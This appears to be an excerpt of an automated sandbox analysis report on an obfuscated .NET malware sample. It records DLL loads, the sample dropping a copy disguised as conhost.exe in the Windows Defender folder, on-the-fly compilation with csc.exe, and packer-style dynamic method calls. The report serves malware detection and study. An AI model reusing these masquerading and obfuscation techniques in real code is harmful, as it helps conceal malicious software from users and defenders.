                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: uxtheme.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: windows.storage.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: wldp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: profapi.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: cryptsp.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: rsaenh.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: cryptbase.dll
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: version.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: wldp.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: profapi.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ktmw32.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: rasman.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: amsi.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: userenv.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: winmm.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: winmmbase.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: mmdevapi.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: devobj.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeSection loaded: ksuser.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDirectory created: C:\Program Files\Windows Defender\en-GB\conhost.exeJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDirectory created: C:\Program Files\Windows Defender\en-GB\088424020bedd6Jump to behavior
                            Source: 4si9noTBNw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: 4si9noTBNw.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                            Source: 4si9noTBNw.exeStatic file information: File size 1920000 > 1048576
                            Source: 4si9noTBNw.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1d4400
                            Source: 4si9noTBNw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.pdb source: 4si9noTBNw.exe, 00000000.00000002.1763786734.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            .NET source code contains method to dynamically call methods (often used by packers)
                            Source: 4si9noTBNw.exe, qHDvmF0J95Squ092xQv.cs.Net Code: Type.GetTypeFromHandle(ngg76RL3TjpoK8hs6gh.fPMnILReVCf(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(ngg76RL3TjpoK8hs6gh.fPMnILReVCf(16777245)),Type.GetTypeFromHandle(ngg76RL3TjpoK8hs6gh.fPMnILReVCf(16777259))})
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline"
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2gwm2xp5\2gwm2xp5.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeCode function: 0_2_00007FFD9BC7E35B pushad ; ret 0_2_00007FFD9BC7E35C
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeCode function: 0_2_00007FFD9BC761B1 push ebp; ret 0_2_00007FFD9BC761D8
                            Source: 4si9noTBNw.exeStatic PE information: section name: .text entropy: 7.53942476676294
                            Source: VTixufCejPQZEvXiB.exe.0.drStatic PE information: section name: .text entropy: 7.53942476676294
                            Source: VTixufCejPQZEvXiB.exe0.0.drStatic PE information: section name: .text entropy: 7.53942476676294
                            Source: VTixufCejPQZEvXiB.exe1.0.drStatic PE information: section name: .text entropy: 7.53942476676294
                            Source: conhost.exe.0.drStatic PE information: section name: .text entropy: 7.53942476676294
                            Source: 4si9noTBNw.exe, IWPQttnkpFdSgFyq8vn.csHigh entropy of concatenated method names: 'WU6P6ZscMb', 'oog8m3b5nUCjCqfjrsqq', 'qDaAu9b5P2xhyGYyphuU', 'm6UNAYb5diSZviucc8Qv', 'GNpgK5b5IVee6vUlEuww', 'vsdj4Db54SBU7p91U995', 'UoUYq1b5b1b50yLDuGOf', 'tuQRK8b5Kh2f4MEcG3pM', 'eRBYDqb56k2IZRmwEW3b', 'tDPP40EJFt'
                            Source: 4si9noTBNw.exe, eOMvH46bWfJR42MeJJU.csHigh entropy of concatenated method names: 'Ecn6P1MItW', 'HpU6dKkpaf', 'MHD6ISnf35', 'fXl6i4buHE74D7UjAjGX', 'CHTidlbuMRHRTVDtFMbx', 'ESNfm0bu3LEmrZQeQUru', 'BJTcqXbu7CXSOIOjZpns', 'FoRrx9buyqb1OsgOBba6', 'VZDqxTbuJ1k3Sj922N22', 'V2Djxmbu9LlqIN1FFHU4'
                            Source: 4si9noTBNw.exe, HI2jHDJU3ecyZiDQa9.csHigh entropy of concatenated method names: 'eSuSu2S5b', 'k9q4ffbwBfdk5s3CVKgj', 'aS8P6ubwWvh8etxCNrOs', 'VyWXZDbwpRBF4XQNfgF6', 'JlRrEGbw5VAmARex4d9x', 'A651V7MJZ', 'aUrl1Gneq', 'ocpiY9WnP', 'QYdXLkmQW', 'jfvvyeFeN'
                            Source: 4si9noTBNw.exe, HrrwsKRmpPclrQAyF0B.csHigh entropy of concatenated method names: 'x3dRhudCSW', 'uYnS3dbrpdB2aavyRcli', 'v0tbu6br5XWIkGLHKceF', 'ty09rlbrw6EMxYnmFgtK', 'vLgqkubroiaYxIt1wyCW', 'tneRAAbrBfvjsoyiUylZ', 'IPy', 'method_0', 'method_1', 'method_2'
                            Source: 4si9noTBNw.exe, YKq4Thlt6OVYpMvt5bL.csHigh entropy of concatenated method names: 'iKIbUyi2AhP', 'DTuljUngoG', 'CSKbUJPKaox', 'odcxEcb8ZUBgjydJH21D', 'uu6iQ4b8FGKPZNTHmL9R', 'tyW1TPb8NR5VWeP2htKI', 'j2yxVqb8TATlWKUHkc4K', 'sOPdAjb8V4gUGUTBaOyp', 'moPF3Gb8tEAn0ihrSNva', 'RLnvBVb8k56ggAp0ue6p'
                            Source: 4si9noTBNw.exe, Q5VRT9UZTk9rE45gpvL.csHigh entropy of concatenated method names: 'bW7UamqP1S', 'wBNJXdbC15oxZmVZFE6u', 'MrLkJBbCJpNdvf9pKTMT', 'QOyGyHbC9kVMPQICt6aW', 'mm9CQpbCllVoPA1Snqbg', 'P9X', 'vmethod_0', 'FRKbdoKAhHM', 'imethod_0', 'wlPCRjbCHLi8mIW4LtvD'
                            Source: 4si9noTBNw.exe, x8Jksr1RuEDR7xN2W4D.csHigh entropy of concatenated method names: 'Os31ZA0mbi', 'cWu1FflfiJ', 'zhl1Vd0xWw', 'YRuS3ObcBA0NuhgboO9k', 'hMSWGCbcWFMlCqw60sDg', 'jQa5cfbcpbxEAbWUxcOf', 'pMP2dObc5B9Msy26auA1', 'MgM1cS1i9P', 'bZs18d6kkp', 'DTt1GJh1h0'
                            Source: 4si9noTBNw.exe, vvtPHoKSrjDPpiCEKwA.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'zTlbUOh9UNn', 'b3Obdbm8D8P', 'vqyIDMbDjSFIgcEsoTNI', 'pq9maDbDenZRE9F5dm4n', 'Y92oxSbDrt16vOMwrDiH'
                            Source: 4si9noTBNw.exe, JC5kapYjMG06T6wktBW.csHigh entropy of concatenated method names: 'VLCYrxE4Tb', 'wacYgPFeqW', 'ks7YaC5xo9', 'GBPY0sxO9e', 'flZYEy8aGB', 'eQRAADbT6OQnUx6uy4t1', 'F39giJbTId2MdgWGNNoM', 'hRbmNhbTK2dDGVP7CdSr', 'zJYEtXbTUob235Fh6KB4', 'AFcoSjbTm9u1UKbtNq2K'
                            Source: 4si9noTBNw.exe, J3NntmK8R9wK1mKZPCw.csHigh entropy of concatenated method names: 'GcBKa6KAwn', 'xIVK0xATWb', 'ys0KELnVo0', 'E7iChLbuO7UvBELYXZnD', 'xr9dAPbu2lZvH4XTJ3LD', 'PljUk4buUM14HtpYuvfN', 'I4EljmbumyMrMfnlsH5G', 'qaDKNEg5Hv', 'ASXKTu1tn5', 'k4bKZoFxAj'
                            Source: 4si9noTBNw.exe, NPma2Yw2dcDehopWD9e.csHigh entropy of concatenated method names: 'MTmwMVEpxX', 'zrSw3HQeOP', 'oU4wHgHXBX', 'RjVw7kHnkR', 'Xiawyy3bMD', 'l2kQM8bZwdkZF6UTvC6Q', 'puDulrbZhrJrO11T62LP', 'f5ml4ZbZQ9RDF0lLsX9k', 'GwbBvwbZo3d8w5A94uwa', 'AWvtcObZpB9JT6gFxKII'
                            Source: 4si9noTBNw.exe, R76a7YPwl28Hgq7meLA.csHigh entropy of concatenated method names: 'iSJPGa8i8T', 'id8PNLQ8Zj', 'yoqPT9oOYn', 'FaOsxLb5tonCyLcDe2Jn', 'yLdvG1b5kdreUxd4aXCn', 'WkVgSwb5Fu7kE55MeQdh', 'Q3xsjtb5VQEAFmlfsE0A', 'osePppY2er', 'LsWP50GfHo', 'MolPBwdfwm'
                            Source: 4si9noTBNw.exe, MEvjowIjcYufCjRH4QI.csHigh entropy of concatenated method names: 'dReIEDv2tp', 'y7lILyqriC', 'srlIqinjAh', 'OPbIzRCfNB', 'jiQK4TjEAa', 'jIRKbdoH0T', 'N7tKnFF6X2', 'H1sr6DbDXYnA2ENXXOop', 'kVkBqcbDlQSjdML2YQNV', 'VeiaOobDiNTc43x2qKXu'
                            Source: 4si9noTBNw.exe, sUDVcHnIDy6VfX8GsQ4.csHigh entropy of concatenated method names: 'DNXn6BrrtY', 'XRHnUWV7ln', 'uionmj8kxv', 'DmZnO1108C', 'MBaGWubp3rtYXXUWyEZj', 'pe0HHubpf4fOOhDGRtsU', 'j8dP7ybpMFKl10Eq1vC1', 'TNpqFIbpHD2O0O66f1d8', 'esE3ndbp72HkLcJE02GN', 'q8Ar0Gbpyh85Es9SKioF'
                            Source: 4si9noTBNw.exe, AFlFQUrWHcMVNLhwyip.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'tVoruZlanw', 'R4Ey3xbaqk0Wk8Sm2iNH', 'c0WuS7bazHf8mCFmbTtH', 'YrNQCwb04jVRjuvjt5ry', 'TiqtKcb0bI13EU8S0juV', 'nvSnVfb0n9ml38g7loNc', 'JJIQF9b0Ptr1IXlGnIN3'
                            Source: 4si9noTBNw.exe, aKugbDacY1m1306t5cA.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'blSaGsI9kJ', 'INwaNHCNkk', 'OfRaTKMDLa', 'Dispose', 'emE4tabE8dCISDvI42vN', 'zIEqtjbEGEugwgbjyVvj', 'TLTpJrbENP4K4pXle0Cg', 'nBxjyMbETd6PxAnuVJlX'
                            Source: 4si9noTBNw.exe, QRa5f36889vQVIaXJtO.csHigh entropy of concatenated method names: 'jMj6aAD2vq', 'pog60BHxNw', 'Qsbs25bSyQuYhpQtruiZ', 'xxxogIbSHAn0ExKPVliv', 'HMoK20bS7h49lYWAokJQ', 'jIL6N95DkD', 'MEN6T8vRM3', 'N7q6Z4DcFE', 'FLM6FUFag0', 'd5q6VY8Ulm'
                            Source: 4si9noTBNw.exe, IPIrIvUyIgwrV3PTZIb.csHigh entropy of concatenated method names: 'LHuUlxwBWl', 'f0ZMwxbSNyEmjPnyxEPa', 'ndMsqFbS8I1QjGXdF4Yl', 'xIuy9fbSGcCX4UkrXB8H', 'piw1fkbSTP5anGPm0xNp', 'jUlU9HScGr', 'D4wtNqbSxUbDFm0ZayhR', 'Ov3BgsbSsRSMg45PQrMM', 'akkNcybSRODxkYiODCXj', 'X9a6APbSSWLloe5A71HY'
                            Source: 4si9noTBNw.exe, VClUh2z1y17W48lUVm.csHigh entropy of concatenated method names: 'a0Vbb91lv0', 'pI2bPWOvBB', 't39bdq65aB', 'WCxbIsL7rC', 'JS4bK7eu4v', 'jP8b6YPuHx', 'FQebmv3EVp', 'vLsrl3boIRaV0LcC0heY', 'Mk0o5xboKbKamt34BfC2', 'SkWeaObo6MTB2pXjku8W'
                            Source: 4si9noTBNw.exe, rIPkTIo8Dd3y76hx0Id.csHigh entropy of concatenated method names: 'qT7oLfQJ6A', 'MLgozW2vUN', 'YM9oNd5iTq', 'cwMoTOc9CQ', 'a0hoZua6oU', 'gLmoF9KRf4', 'jHpoVJ4VHF', 'Av6otRxStm', 'swLokjiuMW', 'eAIojJOJnq'
                            Source: 4si9noTBNw.exe, FrNNtTUcfWY6uQE5Y5r.csHigh entropy of concatenated method names: 'P9X', 'u35bUfodk6A', 'imethod_0', 'kaVUGArq7o', 'M6GVgqbC6TApDxlrkcHt', 'vklcwtbCU4xZUHeLktiB', 'jHs5pKbCm9KNw3SFalsp', 'h6a0tCbCOaFUcgEjkn1s', 'pSI9QIbC2h7EOLCnUm05'
                            Source: 4si9noTBNw.exe, G9n8A0rsAFAZ6lbZRXu.csHigh entropy of concatenated method names: 'qkqbUwpPxS1', 'eoObKQyk5uV', 's90dv0b0hPw1wbgbqtM2', 'hkOK7ib0QGUr0YbH2KpY', 'qkVQr6b0wnDXVHMiNvvn', 'Mq0YHbb0B5Um1QC0yQjV', 'AdxxjGb0pBE4iMUGpeaZ', 'O5VbOMb05kSKPImBdEA2', 'imethod_0', 'eoObKQyk5uV'
                            Source: 4si9noTBNw.exe, i3W3LBSkDd55KwsAydR.csHigh entropy of concatenated method names: 'y3qaWTbeJcH6v0y4lGeh', 'JIyTaqbe7iXFuesZ5DAR', 'bwbm5ZbeyiQ2rcc3JZN3', 'NgaOdRbe9ca4WMVqFyCR', 'zmwSeWTkoN', 'Mh9', 'method_0', 'Nm0Sr2bhrl', 'mxiSg55kLc', 'TBLSagasKk'
                            Source: 4si9noTBNw.exe, aCwFj0l3TwnouTDEHyb.csHigh entropy of concatenated method names: 'RHollSFhUp', 'aHiO2tb8fcQ2iZJfTVgK', 'fvwfCob8MEpi6NcSpLMW', 'bdkN7Ib8OJ6YlMaFDbOx', 'W0iudsb82bVs40k57gMR', 'po4D21b83bm3wvZYwmAf', 'dIyl7YNAF2', 'qboyJdb8UCgATROFhgvZ', 'oCY7Lxb8KFCnIw0Wvflf', 'jE317Zb86p2nhFBeKUtw'
                            Source: 4si9noTBNw.exe, EPxQAYWEvhwoQ6vIq9q.csHigh entropy of concatenated method names: 'MsrWqDRnSa', 'fsjWzuQmag', 'S2mD4CoBvX', 'UTVDbrOf97', 'ssdDnbJmlq', 'rPVDPd9CFH', 'Rpx', 'method_4', 'f6W', 'uL1'
                            Source: 4si9noTBNw.exe, XBfD69peAHvVY8UF3TT.csHigh entropy of concatenated method names: 'F5cpgC6QtW', 'VMMpaihse5', 'AH4p0IBrBO', 'ptwpEHe1kF', 'rSSpLxprAI', 'N4EdFybVItwTjZuLoJXR', 'OZxctPbVPgVeAoweEerT', 'YwBbp2bVdLxMVrHE4bCe', 'VXuc6QbVKPCpBoOnT6Bs', 'ia0CQhbV6i5VsD11OlY0'
                            Source: 4si9noTBNw.exe, v7JLgfmnZhPs34xuq6g.csHigh entropy of concatenated method names: 'ne0mdA7LSt', 'yRbmIEZZDn', 'OvQmKVVwqJ', 'dBhm6LkvXF', 'WrGmURAhc2', 'tLImmXLTsQ', 'JrImOCqrmb', 'p4Vm2jVAEY', 'VrYmfEpQvn', 'XRNmMUClx8'
                            Source: 4si9noTBNw.exe, pFe3gJi7QqdnIyqQXqb.csHigh entropy of concatenated method names: 'qIP0CYbGS7IbdQFM2KkJ', 'tWvnYhbGCSBwGvUWHS2K', 'dLpkSvbGDSlWbdsrIhFN', 'CFGbfYbGuB9JLWNx99Qa', 'method_0', 'method_1', 'SaPiJlYmUG', 'O57i9uhMvZ', 'Wmyi10dK5U', 'cKTilbcRt9'
                            Source: 4si9noTBNw.exe, DcGrRehNDCbMvGpdtfx.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'dVwhZjeAFT', 'T7phFnYpV3', 'Dispose', 'D31', 'wNK'
                            Source: 4si9noTBNw.exe, xUhT9qXM0nWka4MFgaY.csHigh entropy of concatenated method names: 'NIRYbdvk1M', 'reBxUpbNGTKUVrs18JSw', 'CjiNrYbNcihvw5Qijmkk', 'olgn64bN8HBwk0UyRjNH', 'WyaXHyRnqi', 'qjDX7Fnnvk', 'AR0Xy0SUk8', 'eieXJVsd9W', 'jurX9qf6hf', 'aO7X1P3grh'
                            Source: 4si9noTBNw.exe, tAtdmM5W5cvLE9vcrdi.csHigh entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
                            Source: 4si9noTBNw.exe, dZixGWxCMVqAxEPgteI.csHigh entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'vheFywbeTfih2wuXOEZY', 'nD6F9AbeGSI422oZVnjN', 'mUXywJbeNshoqSB3N3Fb'
                            Source: 4si9noTBNw.exe, WnFSh4INGesn0Omfn7P.csHigh entropy of concatenated method names: 'eVxIt4m1Sw', 'Mh6734bDMdk7Q4T0s3SX', 'hbwrZ9bD20OdhrpDkS0M', 'T1BmmFbDfF4fiJiiv8kW', 'U1J', 'P9X', 'lwrbd73vLcG', 'Rahbdyxq8CR', 'otLbU6wlWZg', 'imethod_0'
                            Source: 4si9noTBNw.exe, kIAlNYWUsQJGa2nLW77.csHigh entropy of concatenated method names: 'KZtWOLgFKt', 'QPGW2Alo4d', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'nQlWfvROgn', 'method_2', 'uc7'
                            Source: 4si9noTBNw.exe, kQ9UZVwWXV7agOcR8a5.csHigh entropy of concatenated method names: 'method_0', 'NuGwuu0QHN', 'bchwSKy7m1', 'kinwCIUgRH', 'mArwx0ooHF', 'Xf8wsXK7ZB', 'PPGwRqhBc7', 'NFEyWjbZRkv6YQXwgQKV', 'N2XAOPbZxKXRxED7nbvC', 'pyywD7bZsDEq1Nldo5Tp'
                            Source: 4si9noTBNw.exe, JDkuhaDiPkWdZ2SEtBM.csHigh entropy of concatenated method names: 'Owtu33OWC8', 't5NhQ5bjdZIqj0CIUAIb', 'uW0eI3bjnUdfxSrM4nNs', 'wwZfDJbjPG5V2iHAjreW', 'kt5', 'KT4DvkbRak', 'ReadByte', 'get_CanRead', 'get_CanSeek', 'get_CanWrite'
                            Source: 4si9noTBNw.exe, xS6C9lUo50S81M07MXT.csHigh entropy of concatenated method names: 'lB8U5s894e', 'xaaUB0T26l', 'ipHUWKPF50', 'RnAUDQmSTi', 'ps2UuoqANl', 'XKAUSqA35i', 'HM8Mc2bSzEfZNgRQukW0', 'NJHfrybC4sJDK6thAisa', 'hvyU7UbCbU0VTbyXw7VB', 'YaVL5GbCnEUS92xVGBBw'
                            Source: 4si9noTBNw.exe, XbT34TuCsvxNAZbQb5w.csHigh entropy of concatenated method names: 'Close', 'qL6', 'y7QusY0rbS', 'gXFuRuV5JA', 'vAkuA5pFTE', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                            Source: 4si9noTBNw.exe, Xr4BZ6I7w1uuAm4o5wd.csHigh entropy of concatenated method names: 'ODYIoOJGI1', 'aWHIp2pBt2', 'kDWI5Y5VE9', 'CGiZBtbWt3Zg68vnOBIg', 'Oc8iwobWFdur72dcf72q', 'fP0dZGbWVnTXkvaqrDil', 'V4YLJ5bWkeVXr1qLQ6HE', 'YXhIYp54Rg', 'QnwIhH9I1L', 'BdRlqQbWT47vxoDfeRWB'
                            Source: 4si9noTBNw.exe, dYaZBM6mcwuESxyln3F.csHigh entropy of concatenated method names: 'uc262XAbkT', 'lJS6feBXrl', 'kBhXLJbuY7AiVqnb3UwX', 'HB1WUxbuXCSA6PIQsZkn', 'E9lPsrbuvmOeg4cws7WB', 'YHCKOZbuh5CwrGYxLpQG', 'lUwYFFbuQwWxc2Xsl0dt', 'XKkUr3buw7W1IEqgDXTl', 'cWus8Tbuob8yN656sClv', 'bMHw04bupDKoxIsTwPmH'
                            Source: 4si9noTBNw.exe, oEc3ue613FL3MvSTJNo.csHigh entropy of concatenated method names: 'wLR6peSRWx', 'lTgo5UbueuYgZKAaBlNI', 's9wrvLburByRM9SDc1Jt', 'HCLf38bukM07UsfxBCaG', 'ckNWyrbujUndnXrs5g4V', 'GxJ5c6bugZW8JqVmLYvj', 'Rod6iaNMc7', 'Lv56XR5jcc', 'IMF6vIrYjo', 'Ksw6YKxUYb'
                            Source: 4si9noTBNw.exe, nHX2MEukIVWBufLdnru.csHigh entropy of concatenated method names: 'OgLuef1seM', 'k6r', 'ueK', 'QH3', 'z24ur4scfh', 'Flush', 'NnHugN377k', 'SOOua8LqA3', 'Write', 'vpvu0XF7e2'
                            Source: 4si9noTBNw.exe, c8ku1w5cBq4jZTbFAC1.csHigh entropy of concatenated method names: 'bi25GZimTN', 'ypF5NR1Rj7', 'BKC5T9yco8', 'XQK5ZsHTKh', 'AVZ5F6S9ea', 'FSP5VkQspD', 'CSs5tZN4vQ', 'Oyw5kMnvia', 'CWQ5j2aB8F', 'ORX5es4Js8'
                            Source: 4si9noTBNw.exe, qHDvmF0J95Squ092xQv.csHigh entropy of concatenated method names: 'M2qKr1bLi6jNgXhG3Pm2', 'U0B6rebLXWVrBEwy46Sh', 'ciFErc26Ll', 'JJJyFibLQhEFQ8xhlHKi', 'Esmg84bLwoDyVsXBmTvm', 'vihpPYbLoCdks3k6vjUf', 'yAiyD8bLpvRnyVk3dyCH', 'P3APSCbL56NO5ghL4IVw', 'Rh0KuIbLB6HJt3p3hj7l', 'Q49IiibLWrHkc60i6rAU'
                            Source: 4si9noTBNw.exe, mq5cUCL9gTpdAFriRFq.csHigh entropy of concatenated method names: 'mvmL5qZyqZ', 'GR5LBxpIel', 'L9JLWUIJ0c', 'idLLDyS1ld', 'bYjLuIoNH1', 'Iq8LSWZa9N', 'T0WLCdaU8A', 'bZrLx0bj3N', 'HZXLsn2ymD', 'nLVLRrsWel'
                            Source: 4si9noTBNw.exe, UK5OS5HvBbSStYmCNhE.csHigh entropy of concatenated method names: 'gRI1MpCxpn', 'tvR13UT6uZ', 'CwpMGUbcbXXD6b3TbHbI', 'kD6tsVbAz89mOjJTd0Q8', 'fp8acdbc4KiYF7rp2NOF', 'dGnvribcnukb3qMi9JrF', 'HDD9kybcPeNqu2FqQBc4', 'vcb11wA26m', 'mC5l00bc6Ob4wZAmBtZV', 'cGfSaWbcIIflVWituDWX'
                            Source: 4si9noTBNw.exe, w1nFLcYORxmNsmj3ISS.csHigh entropy of concatenated method names: 'ySuYWGpfsi', 'OxUYfnDaUo', 'cAgYMbEHcP', 'SZoY3qiyqI', 'loWYHapj0h', 'vcIY75Dhew', 'wqWYymckyF', 'BgjYJCBCsK', 'fEBY9VHbVA', 'KksY173U26'
                            Source: 4si9noTBNw.exe, WdXmT4Bq5GMXSXAR5aP.csHigh entropy of concatenated method names: 'rsVW4QitoU', 'Y3NWbg1rp6', 'Yd7', 'OpdWnyneJM', 'l4iWPCcO9r', 'blqWdVsL1T', 'adSWIBZPT5', 'AR7JOIbkOTlj8vdleLtE', 'ttMmhobkU6RflL3MVqFJ', 'Pa7F7VbkmYSK4fIiUXi6'
                            Source: 4si9noTBNw.exe, s755HHdQpQTvXoYuwE9.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'xqabUPaOhiU', 'b3Obdbm8D8P', 'RbwIEDbBDHBsMyeSQLNc', 'k87y9cbBuG9Zd4XsJsAV', 'OPv9bDbBS7BqcMcjxi9j'
                            Source: 4si9noTBNw.exe, i23bCaImM3FiHMs6XI0.csHigh entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'mx8bUIOpmnY', 'b3Obdbm8D8P', 'l1XqmNbWYw6tbOSDupcw', 'I33laVbWh9IuExxh7xkX', 'AHYtwpbWQFOIyHHRdW6h', 'MvnwOBbWw0r5Scm064xn'
                            Source: 4si9noTBNw.exe, exkhVEUO6n2eCNoAhev.csHigh entropy of concatenated method names: 'jIQUfnOBdL', 'lWnUMhEUDF', 'aQcU3FZV6i', 'iTZtTDbSp0aWoQ1l1gZ4', 'Xl0OW5bSweWwnmJ2JXm4', 'sVi5HobSoVhXKASpqNcU', 'QRGWB3bS5TJDmKBFtWrG', 'sYMw1xbSBoqQID0HG25y', 'klpLAMbSW1wi9vWc7wEg', 'GliNLRbSDDJ9tA8I3dor'
                            Source: 4si9noTBNw.exe, devr50pZQ85kOqWOfsC.csHigh entropy of concatenated method names: 'lGfpVEUqc1', 'HSMptRV1sV', 'EKupkIh8yW', 'DC98x7bFLHu3NHsjxYAw', 'zryaUMbF0Moe3y9vJG7c', 'hNnNJrbFEs1KuDlRMJ8C', 'VqbnFTbFqLihx1kKoii1', 'tuHxHVbFz7wVHFtKC6B6', 'fngOBkbV4D38sqGcZKZ3', 'X378subVbvSRrqDWoiuY'
                            Source: 4si9noTBNw.exe, aTMRHYRTKLTveGkebx5.csHigh entropy of concatenated method names: 'IHqbUhS0BBF', 'V1lRFT1tiL', 'yTXRVPLS2G', 'pltRtXjJN5', 'WbV6cabr8hdpHZjWDKoc', 'D19gjdbrGDLs9I3G4NHh', 'd2ZeHvbrNfmpIjV1ZW12', 'Bjb8bLbrToUaBCFwGn16', 'GvbabtbrZqWa1LlCnt6h', 'dVNUnLbrFaZbE8gvo5Nk'
                            Source: 4si9noTBNw.exe, qZkXtQQYly7orSFlBuq.csHigh entropy of concatenated method names: 'UIsQQwFpAd', 'j7DQwMNyea', 'qWCQokUHBu', 'NhlQp1MKKW', 'TAtQ5Pmotv', 'xttCtIbZmno0D1OGHEmB', 'gjxF2SbZ66McxlABi8QE', 'J1qFkpbZUp8mrPcFAxUV', 'zWDaQ1bZOpneMesSjR0G', 'eEkK11bZ2dl42FooyJpS'
